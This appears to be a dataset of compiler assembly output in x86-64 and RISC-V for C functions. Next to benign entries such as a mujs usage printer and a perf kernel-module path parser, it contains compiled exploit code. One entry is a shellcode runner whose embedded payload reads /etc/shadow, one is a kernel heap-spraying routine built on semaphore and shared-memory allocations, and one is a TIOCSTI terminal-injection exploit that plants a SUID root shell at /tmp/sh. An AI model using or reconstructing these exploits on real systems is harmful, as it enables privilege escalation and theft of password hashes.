.file "extr_main.c_usage_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "Usage: mujs [options] [script [scriptArgs*]]\n" .align 3 .LC1: .string "\t-i: Enter interactive prompt after running code.\n" .align 3 .LC2: .string "\t-s: Check strictness.\n" .text .align 1 .type usage, @function usage: addi sp,sp,-16 sd s0,0(sp) lla s0,.LANCHOR0 lw a0,0(s0) lla a1,.LC0 sd ra,8(sp) call fprintf@plt lw a0,0(s0) lla a1,.LC1 call fprintf@plt lw a0,0(s0) lla a1,.LC2 call fprintf@plt ld s0,0(sp) ld ra,8(sp) li a0,1 addi sp,sp,16 tail exit@plt .size usage, .-usage .globl stderr .bss .align 2 .set .LANCHOR0,. + 0 .type stderr, @object .size stderr, 4 stderr: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_43962.c_alloc_sem_aug_v3_4
.file "extr_43962.c_alloc_sem_aug_v3_4.c" .text .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC0: .string "[*err*]semget failed, errno == 0x%x\n" .text .p2align 4 .globl alloc_sem .type alloc_sem, @function alloc_sem: .LFB0: .cfi_startproc endbr64 subq $8, %rsp .cfi_def_cfa_offset 16 movl curr_key(%rip), %r8d movl IPC_CREAT(%rip), %edx movl %edi, %esi orl $438, %edx leal 1(%r8), %eax movl %r8d, %edi movl %eax, curr_key(%rip) call semget@PLT cmpl $-1, %eax jne .L8 movl $-1, %eax addq $8, %rsp .cfi_remember_state .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L8: .cfi_restore_state movl errno(%rip), %esi leaq .LC0(%rip), %rdi call printf@PLT movl $-1, %eax addq $8, %rsp .cfi_def_cfa_offset 8 ret .cfi_endproc .LFE0: .size alloc_sem, .-alloc_sem .globl errno .bss .align 4 .type errno, @object .size errno, 4 errno: .zero 4 .globl curr_key .align 4 .type curr_key, @object .size curr_key, 4 curr_key: .zero 4 .globl IPC_CREAT .align 4 .type IPC_CREAT, @object .size IPC_CREAT, 4 IPC_CREAT: .zero 4 .globl g_aug_volatile_1024 .data .align 4 .type g_aug_volatile_1024, @object .size g_aug_volatile_1024, 4 g_aug_volatile_1024: .long 5 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_43962.c_alloc_sem_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*err*]semget failed, errno == 0x%x\n" .text .align 1 .globl alloc_sem .type alloc_sem, @function alloc_sem: addi sp,sp,-16 sd s0,0(sp) lla s0,.LANCHOR0 lw a5,0(s0) lw a2,4(s0) sext.w a1,a0 addiw a4,a5,1 mv a0,a5 ori a2,a2,438 sd ra,8(sp) sw a4,0(s0) call semget@plt li a5,-1 bne a0,a5,.L5 ld ra,8(sp) ld s0,0(sp) li a0,-1 addi sp,sp,16 jr ra .L5: lw a1,8(s0) lla a0,.LC0 call printf@plt ld ra,8(sp) ld s0,0(sp) li a0,-1 addi sp,sp,16 jr ra .size alloc_sem, .-alloc_sem .globl errno .globl curr_key .globl IPC_CREAT .globl g_aug_volatile_1024 .data .align 2 .type g_aug_volatile_1024, @object .size g_aug_volatile_1024, 4 g_aug_volatile_1024: .word 5 .bss .align 2 .set .LANCHOR0,. + 0 .type curr_key, @object .size curr_key, 4 curr_key: .zero 4 .type IPC_CREAT, @object .size IPC_CREAT, 4 IPC_CREAT: .zero 4 .type errno, @object .size errno, 4 errno: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_43704.c_main_aug_v3_1
.file "extr_43704.c_main_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*] Taille du ShellCode = %d\n" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %rbx .cfi_def_cfa_offset 16 .cfi_offset 3, -16 subq $64, %rsp .cfi_def_cfa_offset 80 movdqa .LC1(%rip), %xmm0 movq %fs:40, %rax movq %rax, 56(%rsp) xorl %eax, %eax movq %rsp, %rbx movb $0, 42(%rsp) movabsq $842421110242889953, %rax movaps %xmm0, (%rsp) movdqa .LC2(%rip), %xmm0 movq %rbx, %rdi movq %rax, 32(%rsp) movl $-32563, %eax movaps %xmm0, 16(%rsp) movw %ax, 40(%rsp) call strlen@PLT leaq .LC0(%rip), %rdi movl %eax, %esi call printf@PLT xorl %eax, %eax call *%rbx movq 56(%rsp), %rax subq %fs:40, %rax jne .L5 addq $64, %rsp .cfi_remember_state .cfi_def_cfa_offset 16 xorl %eax, %eax popq %rbx .cfi_def_cfa_offset 8 ret .L5: .cfi_restore_state call __stack_chk_fail@PLT .cfi_endproc .LFE1: .size main, .-main .section .rodata.cst16,"aM",@progbits,16 .align 16 .LC1: .quad 8386093036405309489 .quad 5828653450055004008 .align 16 .LC2: .quad 3400051105867260264 .quad -8546859689883178893 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_43704.c_main_aug_v3_1.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC1: .string "[*] Taille du ShellCode = %d\n" .align 3 .LC0: .string "1\300Ph/cath/bin\211\343Phadowh//shh/etc\211\341PQS\211\341\260\013\315\200" .section .text.startup,"ax",@progbits .align 1 .globl main .type main, @function main: lla a5,.LC0 addi sp,sp,-96 lhu a4,40(a5) ld a7,0(a5) ld a6,8(a5) ld a2,24(a5) ld a3,32(a5) ld a1,16(a5) lbu a5,42(a5) sd s0,80(sp) sd s1,72(sp) addi s0,sp,8 la s1,__stack_chk_guard ld t1, 0(s1) sd t1, 56(sp) li t1, 0 mv a0,s0 sh a4,48(sp) sb a5,50(sp) sd ra,88(sp) sd a7,8(sp) sd a6,16(sp) sd a2,32(sp) sd a3,40(sp) sd a1,24(sp) call strlen@plt mv a1,a0 lla a0,.LC1 call printf@plt jalr s0 ld a4, 56(sp) ld a5, 0(s1) xor a5, a4, a5 li a4, 0 bne a5,zero,.L5 ld ra,88(sp) ld s0,80(sp) ld s1,72(sp) li a0,0 addi sp,sp,96 jr ra .L5: call __stack_chk_fail@plt .size main, .-main .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_dso.c___kmod_path__parse_aug_v3_3
.file "extr_dso.c___kmod_path__parse_aug_v3_3.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[kernel.kallsyms]" .LC1: .string "[guest.kernel.kallsyms" .LC2: .string "[vdso]" .LC3: .string "[vdso32]" .LC4: .string "[vdsox32]" .LC5: .string "[vsyscall]" .LC6: .string ".ko" .LC7: .string "[%.*s]" .LC8: .string "%s" .text .p2align 4 .globl __kmod_path__parse .type __kmod_path__parse, @function __kmod_path__parse: .LFB0: .cfi_startproc endbr64 pushq %r14 .cfi_def_cfa_offset 16 .cfi_offset 14, -16 pushq %r13 .cfi_def_cfa_offset 24 .cfi_offset 13, -24 movl %edx, %r13d pushq %r12 .cfi_def_cfa_offset 32 .cfi_offset 12, -32 pushq %rbp .cfi_def_cfa_offset 40 .cfi_offset 6, -40 movq %rsi, %rbp movl $47, %esi pushq %rbx .cfi_def_cfa_offset 48 .cfi_offset 3, -48 movq %rdi, %rbx movq %rbp, %rdi call strrchr@PLT movq %rbp, %rdi movl $46, %esi movq %rax, %r12 call strrchr@PLT xorl %esi, %esi movl $12, %edx movq %rbx, %rdi movq %rax, %r14 call memset@PLT testq %r12, %r12 leaq 1(%r12), %rax cmovne %rax, %rbp cmpb $91, 0(%rbp) jne .L39 testq %r14, %r14 je .L14 leaq 1(%r14), %rdi call is_supported_compression@PLT cmpl COMP_ID__NONE(%rip), %eax movl %eax, 8(%rbx) jg .L40 cmpq %rbp, %r14 ja .L41 .L11: testl %r13d, %r13d je .L37 movl (%rbx), %eax leaq 4(%rbx), %rdi testl %eax, %eax je .L12 movl %r14d, %edx xorl %eax, %eax leaq .LC7(%rip), %rsi movq %rbp, %rcx subl %ebp, %edx call asprintf@PLT cmpl $-1, %eax je .L36 .L13: movl 4(%rbx), %edi movl $95, %edx movl $45, %esi call strreplace@PLT .L37: popq %rbx .cfi_remember_state .cfi_def_cfa_offset 40 xorl %eax, %eax popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L39: .cfi_restore_state movl $17, %edx leaq .LC0(%rip), %rsi movq %rbp, %rdi call strncmp@PLT testq %rax, %rax jne .L42 .L4: xorl %eax, %eax movl %eax, (%rbx) .L14: testl %r13d, %r13d je .L37 movq %rbp, %rdi call strdup@PLT movl %eax, 4(%rbx) testl %eax, %eax jne .L37 .L36: movl ENOMEM(%rip), %eax popq %rbx .cfi_remember_state .cfi_def_cfa_offset 40 popq %rbp .cfi_def_cfa_offset 32 popq %r12 .cfi_def_cfa_offset 24 negl %eax popq %r13 .cfi_def_cfa_offset 16 popq %r14 .cfi_def_cfa_offset 8 ret .p2align 4,,10 .p2align 3 .L40: .cfi_restore_state subq $3, %r14 cmpq %rbp, %r14 jbe .L11 .L41: movl $3, %edx leaq .LC6(%rip), %rsi movq %r14, %rdi call strncmp@PLT testq %rax, %rax sete %al movzbl %al, %eax movl %eax, (%rbx) jmp .L11 .p2align 4,,10 .p2align 3 .L42: movl $22, %edx leaq .LC1(%rip), %rsi movq %rbp, %rdi call strncmp@PLT testq %rax, %rax je .L4 movl $6, %edx leaq .LC2(%rip), %rsi movq %rbp, %rdi call strncmp@PLT testq %rax, %rax je .L4 movl $8, %edx leaq .LC3(%rip), %rsi movq %rbp, %rdi call strncmp@PLT testq %rax, %rax je .L4 movl $9, %edx leaq .LC4(%rip), %rsi movq %rbp, %rdi call strncmp@PLT testq %rax, %rax je .L4 movl $10, %edx leaq .LC5(%rip), %rsi movq %rbp, %rdi call strncmp@PLT testq %rax, %rax setne %al movzbl %al, %eax movl %eax, (%rbx) jmp .L14 .p2align 4,,10 .p2align 3 .L12: xorl %eax, %eax movq %rbp, %rdx leaq .LC8(%rip), %rsi call asprintf@PLT cmpl $-1, %eax jne .L13 jmp .L36 .cfi_endproc .LFE0: .size __kmod_path__parse, .-__kmod_path__parse .globl ENOMEM .bss .align 4 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .globl COMP_ID__NONE .align 4 .type COMP_ID__NONE, @object .size COMP_ID__NONE, 4 COMP_ID__NONE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_dso.c___kmod_path__parse_aug_v3_3.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[kernel.kallsyms]" .align 3 .LC1: .string "[guest.kernel.kallsyms" .align 3 .LC2: .string "[vdso]" .align 3 .LC3: .string "[vdso32]" .align 3 .LC4: .string "[vdsox32]" .align 3 .LC5: .string "[vsyscall]" .align 3 .LC6: .string ".ko" .align 3 .LC7: .string "[%.*s]" .align 3 .LC8: .string "%s" .text .align 1 .globl __kmod_path__parse .type __kmod_path__parse, @function __kmod_path__parse: addi sp,sp,-48 sd s0,32(sp) mv s0,a1 sd s2,16(sp) li a1,47 mv s2,a0 mv a0,s0 sd ra,40(sp) sd s1,24(sp) sd s3,8(sp) sd s4,0(sp) mv s4,a2 call strrchr@plt mv s1,a0 li a1,46 mv a0,s0 call strrchr@plt mv s3,a0 li a2,12 li a1,0 mv a0,s2 call memset@plt beq s1,zero,.L2 addi s0,s1,1 .L2: lbu a4,0(s0) li a5,91 bne a4,a5,.L3 beq s3,zero,.L4 addi a0,s3,1 call is_supported_compression@plt lla s1,.LANCHOR0 lw a5,4(s1) sw a0,8(s2) bge a5,a0,.L11 addi s3,s3,-3 .L11: bgtu s3,s0,.L44 beq s4,zero,.L41 .L45: lw a5,0(s2) addi a0,s2,4 beq a5,zero,.L13 mv a3,s0 subw a2,s3,s0 lla a1,.LC7 call asprintf@plt li a5,-1 beq a0,a5,.L42 .L14: lw a0,4(s2) li a2,95 li a1,45 call strreplace@plt .L41: li a0,0 .L9: ld ra,40(sp) ld s0,32(sp) ld s1,24(sp) ld s2,16(sp) ld s3,8(sp) ld s4,0(sp) addi sp,sp,48 jr ra .L3: li a2,17 lla a1,.LC0 mv a0,s0 call strncmp@plt bne a0,zero,.L6 .L7: sw zero,0(s2) .L4: beq s4,zero,.L41 .L8: mv a0,s0 call strdup@plt sw a0,4(s2) bne a0,zero,.L41 ld ra,40(sp) ld s0,32(sp) lw a0,.LANCHOR0 ld s1,24(sp) ld s2,16(sp) ld s3,8(sp) ld s4,0(sp) negw a0,a0 addi sp,sp,48 jr ra .L6: li a2,22 lla a1,.LC1 mv a0,s0 call strncmp@plt beq a0,zero,.L7 li a2,6 lla a1,.LC2 mv a0,s0 call strncmp@plt beq a0,zero,.L7 li a2,8 lla a1,.LC3 mv a0,s0 call strncmp@plt beq a0,zero,.L7 li a2,9 lla a1,.LC4 mv a0,s0 call strncmp@plt beq a0,zero,.L7 li a2,10 lla a1,.LC5 mv a0,s0 call strncmp@plt beq a0,zero,.L7 li a5,1 sw a5,0(s2) beq s4,zero,.L41 j .L8 .L44: li a2,3 lla a1,.LC6 mv a0,s3 call strncmp@plt seqz a0,a0 sw a0,0(s2) beq s4,zero,.L41 j .L45 .L13: mv a2,s0 lla a1,.LC8 call asprintf@plt li a5,-1 bne a0,a5,.L14 .L42: lw a0,0(s1) negw a0,a0 j .L9 .size __kmod_path__parse, .-__kmod_path__parse .globl ENOMEM .globl COMP_ID__NONE .bss .align 2 .set .LANCHOR0,. + 0 .type ENOMEM, @object .size ENOMEM, 4 ENOMEM: .zero 4 .type COMP_ID__NONE, @object .size COMP_ID__NONE, 4 COMP_ID__NONE: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_43962.c_shape_aug_v3_4
.file "extr_43962.c_shape_aug_v3_4.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "[*err] socketpair failed\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "[*err*] bytes < 0, are you root?\n" .align 8 .LC2: .string "[*] allocate holes before the workspace\n" .align 8 .LC3: .string "[*] alloc 0xc pages groups, adjust to continuous allocations\n" .section .rodata.str1.1 .LC4: .string "p" .section .rodata.str1.8 .align 8 .LC5: .string "[*] allocating (0xc - shm | shm) AFTER the workspace\n" .section .rodata.str1.1 .LC6: .string "[*] alloc workspace pages\n" .section .rodata.str1.8 .align 8 .LC7: .string "[*] finish allocate workspace allocations\n" .align 8 .LC8: .string "[*] free middle allocation, creating workspace freed\n" .align 8 .LC9: .string "[*] free prepared holes, create little pages holes before the workspace\n" .text .p2align 4 .globl shape .type shape, @function shape: .LFB0: .cfi_startproc endbr64 pushq %r15 .cfi_def_cfa_offset 16 .cfi_offset 15, -16 pushq %r14 .cfi_def_cfa_offset 24 .cfi_offset 14, -24 pushq %r13 .cfi_def_cfa_offset 32 .cfi_offset 13, -32 pushq %r12 .cfi_def_cfa_offset 40 .cfi_offset 12, -40 pushq %rbp .cfi_def_cfa_offset 48 .cfi_offset 6, -48 pushq %rbx .cfi_def_cfa_offset 56 .cfi_offset 3, -56 subq $4096, %rsp .cfi_def_cfa_offset 4152 orq $0, (%rsp) subq $4096, %rsp .cfi_def_cfa_offset 8248 orq $0, (%rsp) subq $56, %rsp .cfi_def_cfa_offset 8304 xorl %esi, %esi movl $4, %edx movq %fs:40, %rax movq %rax, 8232(%rsp) xorl %eax, %eax movq %rdi, %rbx leaq 8(%rsp), %rdi call memset@PLT movl SOCK_STREAM(%rip), %esi movl AF_UNIX(%rip), %edi xorl %edx, %edx leaq 24(%rsp), %rcx call socketpair@PLT cmpl $-1, %eax je .L26 movl $1, %edi call spray@PLT movq %rax, %rbp cmpq $-1, %rax je .L27 movq %rax, (%rbx) leaq 16(%rsp), %rsi movq %rax, %rdi leaq 32(%rsp), %r12 leaq 8224(%rsp), %r13 movq %r12, %rbx call get_size_factor@PLT leaq .LC2(%rip), %rdi movq %rax, %r14 call printf@PLT .p2align 4,,10 .p2align 3 .L5: movl $28672, %edi addq $8, %rbx call alloc_sem@PLT movq %rax, -8(%rbx) cmpq %rbx, %r13 jne .L5 movl $32, %ebx .p2align 4,,10 .p2align 3 .L6: movl $28672, %edi call alloc_sem@PLT subl $1, %ebx jne .L6 movl $8192, %ebx .p2align 4,,10 .p2align 3 .L7: movl $4063, %edi call alloc_sem@PLT subl $1, %ebx jne .L7 movl $8192, %ebx .p2align 4,,10 .p2align 3 .L8: movl $3, %edi call alloc_sem@PLT subl $1, %ebx jne .L8 xorl %eax, %eax call fork@PLT testq %rax, %rax jle .L9 leaq .LC3(%rip), %rdi leaq .LC4(%rip), %r14 movl $5, %ebp call printf@PLT movl $5, %edi call spray@PLT movl 28(%rsp), %edi movl $1, %edx movq %r14, %rsi call write@PLT movl 28(%rsp), %edi leaq 7(%rsp), %rsi movl $1, %edx call read@PLT leaq .LC5(%rip), %rdi call printf@PLT .p2align 4,,10 .p2align 3 .L10: movl $4061, %edi leal -5(%rbp), %ebx call alloc_sem@PLT .L12: movl %ebx, %edi addl $1, %ebx call alloc_shm@PLT cmpl %ebx, %ebp jne .L12 addl $256, %ebp cmpl $65541, %ebp jne .L10 movl 28(%rsp), %edi movl $1, %edx movq %r14, %rsi call write@PLT .L11: leaq 12(%rsp), %rbx .p2align 4,,10 .p2align 3 .L13: movq %rbx, %rdi call wait@PLT testq %rax, %rax jg .L13 leaq .LC9(%rip), %rdi call printf@PLT .p2align 4,,10 .p2align 3 .L14: movq (%r12), %rdi addq $8, %r12 call free_sem@PLT cmpq %r13, %r12 jne .L14 xorl %eax, %eax .L1: movq 8232(%rsp), %rdx subq %fs:40, %rdx jne .L28 addq $8248, %rsp .cfi_remember_state .cfi_def_cfa_offset 56 popq %rbx .cfi_def_cfa_offset 48 popq %rbp .cfi_def_cfa_offset 40 popq %r12 .cfi_def_cfa_offset 32 popq %r13 .cfi_def_cfa_offset 24 popq %r14 .cfi_def_cfa_offset 16 popq %r15 .cfi_def_cfa_offset 8 ret .L9: .cfi_restore_state movl 24(%rsp), %edi leaq 7(%rsp), %r15 movl $1, %edx movq %r15, %rsi call read@PLT leaq .LC6(%rip), %rdi call printf@PLT movq %r14, %rax xorl %edx, %edx divq %rbp leaq 1(%rax), %rdi call spray@PLT leaq .LC7(%rip), %rdi call printf@PLT movl 24(%rsp), %edi movl $1, %edx leaq .LC4(%rip), %rsi call write@PLT movl 24(%rsp), %edi movl $1, %edx movq %r15, %rsi call read@PLT leaq .LC8(%rip), %rdi call printf@PLT movl $1, %edi call exit@PLT jmp .L11 .L26: leaq .LC0(%rip), %rdi call printf@PLT movl $1, %eax jmp .L1 .L27: leaq .LC1(%rip), %rdi call printf@PLT movl $1, %eax jmp .L1 .L28: call __stack_chk_fail@PLT .cfi_endproc .LFE0: .size shape, .-shape .globl SOCK_STREAM .bss .align 4 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .globl AF_UNIX .align 4 .type AF_UNIX, @object .size AF_UNIX, 4 AF_UNIX: .zero 4 .globl g_aug_volatile_8667 .data .align 4 .type g_aug_volatile_8667, @object .size g_aug_volatile_8667, 4 g_aug_volatile_8667: .long 7 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.file "extr_43962.c_shape_aug_v3_4.c" .option pic .text .section .rodata.str1.8,"aMS",@progbits,1 .align 3 .LC0: .string "[*err] socketpair failed\n" .align 3 .LC1: .string "[*err*] bytes < 0, are you root?\n" .align 3 .LC2: .string "[*] allocate holes before the workspace\n" .align 3 .LC3: .string "[*] alloc 0xc pages groups, adjust to continuous allocations\n" .align 3 .LC4: .string "p" .align 3 .LC5: .string "[*] allocating (0xc - shm | shm) AFTER the workspace\n" .align 3 .LC6: .string "[*] alloc workspace pages\n" .align 3 .LC7: .string "[*] finish allocate workspace allocations\n" .align 3 .LC8: .string "[*] free middle allocation, creating workspace freed\n" .align 3 .LC9: .string "[*] free prepared holes, create little pages holes before the workspace\n" .text .align 1 .globl shape .type shape, @function shape: addi sp,sp,-112 sd s0,96(sp) sd s2,80(sp) li s0,-8192 li s2,8192 li t0,-8192 addi a4,s0,-32 addi a5,s2,48 sd ra,104(sp) sd s1,88(sp) sd s4,64(sp) sd s3,72(sp) sd s5,56(sp) sd s6,48(sp) add a5,a5,a4 add sp,sp,t0 addi a4,s2,40 add a4,a4,sp la s4,__stack_chk_guard li a2,4 li a1,0 mv s1,a0 add a0,a5,sp ld a5, 0(s4) sd a5, 0(a4) li a5, 0 call memset@plt lla a5,.LANCHOR0 lw a1,0(a5) lw a0,4(a5) addi a3,s0,-16 addi a5,s2,48 add a5,a5,a3 add a3,a5,sp li a2,0 call socketpair@plt li s2,-1 beq a0,s2,.L26 li a0,1 call spray@plt mv s5,a0 beq a0,s2,.L27 li s2,8192 addi a1,s0,-24 addi a5,s2,48 add a5,a5,a1 add a1,a5,sp sd a0,0(s1) call get_size_factor@plt mv s6,a0 lla a0,.LC2 call printf@plt addi s0,s0,-8 addi a4,s2,48 mv a5,s2 add a4,a4,s0 add s2,a4,sp addi a5,a5,40 add s3,sp,a5 mv s0,s2 .L5: li a0,28672 call alloc_sem@plt sd a0,0(s0) addi s0,s0,8 bne s3,s0,.L5 li s0,32 .L6: addiw s0,s0,-1 li a0,28672 call alloc_sem@plt bne s0,zero,.L6 li s1,4096 li s0,8192 addi s1,s1,-33 .L7: addiw s0,s0,-1 mv a0,s1 call alloc_sem@plt bne s0,zero,.L7 li s0,8192 .L8: addiw s0,s0,-1 li a0,3 call alloc_sem@plt bne s0,zero,.L8 call fork@plt ble a0,zero,.L9 lla a0,.LC3 call printf@plt li a0,5 call spray@plt li s5,8192 li s0,-8192 addi a5,s5,48 add a5,a5,s0 add s1,a5,sp lw a0,-12(s1) li a2,1 lla a1,.LC4 call write@plt lw a0,-12(s1) addi a1,s0,-33 addi a5,s5,48 add a5,a5,a1 li a2,1 add a1,a5,sp call read@plt lla a0,.LC5 li s6,4096 li s5,65536 call printf@plt li s1,5 addi s6,s6,-35 addi s5,s5,5 .L10: mv a0,s6 call alloc_sem@plt addiw s0,s1,-5 .L12: mv a0,s0 addiw s0,s0,1 call alloc_shm@plt bne s1,s0,.L12 addiw s1,s1,256 bne s1,s5,.L10 li a4,8192 li a5,-8192 addi a4,a4,48 add a4,a4,a5 add a5,a4,sp lw a0,-12(a5) li a2,1 lla a1,.LC4 call write@plt .L11: li s0,-8192 li a5,8192 addi s0,s0,-28 addi a5,a5,48 add a5,a5,s0 add s0,a5,sp .L13: mv a0,s0 call wait@plt bgt a0,zero,.L13 lla a0,.LC9 call printf@plt .L14: ld a0,0(s2) addi s2,s2,8 call free_sem@plt bne s2,s3,.L14 li a0,0 .L3: li a5,8192 addi a5,a5,40 add a5,a5,sp ld a4, 0(a5) ld a5, 0(s4) xor a5, a4, a5 li a4, 0 bne a5,zero,.L28 li t0,8192 add sp,sp,t0 ld ra,104(sp) ld s0,96(sp) ld s1,88(sp) ld s2,80(sp) ld s3,72(sp) ld s4,64(sp) ld s5,56(sp) ld s6,48(sp) addi sp,sp,112 jr ra .L9: li a3,8192 addi a4,a3,48 li a5,-8192 add a4,a4,a5 add s1,a4,sp addi a5,a5,-33 addi a4,a3,48 add a4,a4,a5 lw a0,-16(s1) add s0,a4,sp mv a1,s0 li a2,1 call read@plt lla a0,.LC6 call printf@plt divu a0,s6,s5 addi a0,a0,1 call spray@plt lla a0,.LC7 call printf@plt lw a0,-16(s1) li a2,1 lla a1,.LC4 call write@plt lw a0,-16(s1) li a2,1 mv a1,s0 call read@plt lla a0,.LC8 call printf@plt li a0,1 call exit@plt j .L11 .L26: lla a0,.LC0 call printf@plt li a0,1 j .L3 .L27: lla a0,.LC1 call printf@plt li a0,1 j .L3 .L28: call __stack_chk_fail@plt .size shape, .-shape .globl SOCK_STREAM .globl AF_UNIX .globl g_aug_volatile_8667 .data .align 2 .type g_aug_volatile_8667, @object .size g_aug_volatile_8667, 4 g_aug_volatile_8667: .word 7 .bss .align 2 .set .LANCHOR0,. + 0 .type SOCK_STREAM, @object .size SOCK_STREAM, 4 SOCK_STREAM: .zero 4 .type AF_UNIX, @object .size AF_UNIX, 4 AF_UNIX: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04) 11.4.0" .section .note.GNU-stack,"",@progbits
extr_41173.c_main_aug_v3_1
.file "extr_41173.c_main_aug_v3_1.c" .text .section .rodata.str1.1,"aMS",@progbits,1 .LC0: .string "Usage: %s /dev/pts/X\n" .section .rodata.str1.8,"aMS",@progbits,1 .align 8 .LC1: .string "Where X is next slave device to be created\n" .section .rodata.str1.1 .LC2: .string "[-] %s device already exists\n" .LC3: .string "[-] fork failed\n" .section .rodata.str1.8 .align 8 .LC4: .string "[*] Waiting for slave device %s\n" .section .rodata.str1.1 .LC5: .string "[+] Got PTY slave %s\n" .section .rodata.str1.8 .align 8 .LC6: .string "[+] Making PTY slave the controlling terminal" .align 8 .LC7: .string "cp /bin/sh /tmp/sh; chmod u+s /tmp/sh\n" .section .rodata.str1.1 .LC8: .string "[+] SUID shell at /tmp/sh" .section .text.startup,"ax",@progbits .p2align 4 .globl main .type main, @function main: .LFB1: .cfi_startproc endbr64 pushq %r12 .cfi_def_cfa_offset 16 .cfi_offset 12, -16 pushq %rbp .cfi_def_cfa_offset 24 .cfi_offset 6, -24 pushq %rbx .cfi_def_cfa_offset 32 .cfi_offset 3, -32 movq %rsi, %rbx cmpl $2, %edi je .L14 movq 8(%rsi), %rdi movl F_OK(%rip), %esi call access@PLT testl %eax, %eax je .L15 call fork@PLT movl %eax, %r12d testl %eax, %eax js .L16 jne .L6 movq 8(%rbx), %rsi leaq .LC4(%rip), %rdi xorl %eax, %eax call printf@PLT .p2align 4,,10 .p2align 3 .L7: movq 8(%rbx), %rdi movl O_WRONLY(%rip), %esi call open@PLT movl %eax, %ebp cmpl $-1, %eax je .L7 movq 8(%rbx), %rsi leaq .LC5(%rip), %rdi xorl %eax, %eax call printf@PLT leaq .LC6(%rip), %rdi call puts@PLT movl %ebp, %edi xorl %esi, %esi call dup2@PLT movl %ebp, %edi movl $1, %esi call dup2@PLT movl %ebp, %edi movl $2, %esi leaq .LC7(%rip), %rbp call dup2@PLT xorl %eax, %eax call setsid@PLT movl TIOCSCTTY(%rip), %esi movl $1, %edx xorl %edi, %edi call ioctl@PLT .p2align 4,,10 .p2align 3 .L8: movl TIOCSTI(%rip), %esi movl %ebp, %edx xorl %edi, %edi subq $1, %rbp call ioctl@PLT cmpb $0, 0(%rbp) jne .L8 .L1: movl %r12d, %eax popq %rbx .cfi_remember_state .cfi_def_cfa_offset 24 popq %rbp .cfi_def_cfa_offset 16 popq %r12 .cfi_def_cfa_offset 8 ret .L15: .cfi_restore_state movq 8(%rbx), %rdx movl stderr(%rip), %edi leaq .LC2(%rip), %rsi movl $1, %r12d call fprintf@PLT jmp .L1 .L14: movq (%rsi), %rdx movl stderr(%rip), %edi xorl %eax, %eax leaq .LC0(%rip), %rsi movl $1, %r12d call fprintf@PLT movl stderr(%rip), %edi leaq .LC1(%rip), %rsi xorl %eax, %eax call fprintf@PLT jmp .L1 .L16: movl stderr(%rip), %edi leaq .LC3(%rip), %rsi xorl %eax, %eax movl $1, %r12d call fprintf@PLT jmp .L1 .L6: xorl %edi, %edi xorl %r12d, %r12d call wait@PLT leaq .LC8(%rip), %rdi call puts@PLT jmp .L1 .cfi_endproc .LFE1: .size main, .-main .globl stderr .bss .align 4 .type stderr, @object .size stderr, 4 stderr: .zero 4 .globl TIOCSTI .align 4 .type TIOCSTI, @object .size TIOCSTI, 4 TIOCSTI: .zero 4 .globl TIOCSCTTY .align 4 .type TIOCSCTTY, @object .size TIOCSCTTY, 4 TIOCSCTTY: .zero 4 .globl O_WRONLY .align 4 .type O_WRONLY, @object .size O_WRONLY, 4 O_WRONLY: .zero 4 .globl F_OK .align 4 .type F_OK, @object .size F_OK, 4 F_OK: .zero 4 .ident "GCC: (Ubuntu 11.4.0-1ubuntu1~22.04.2) 11.4.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
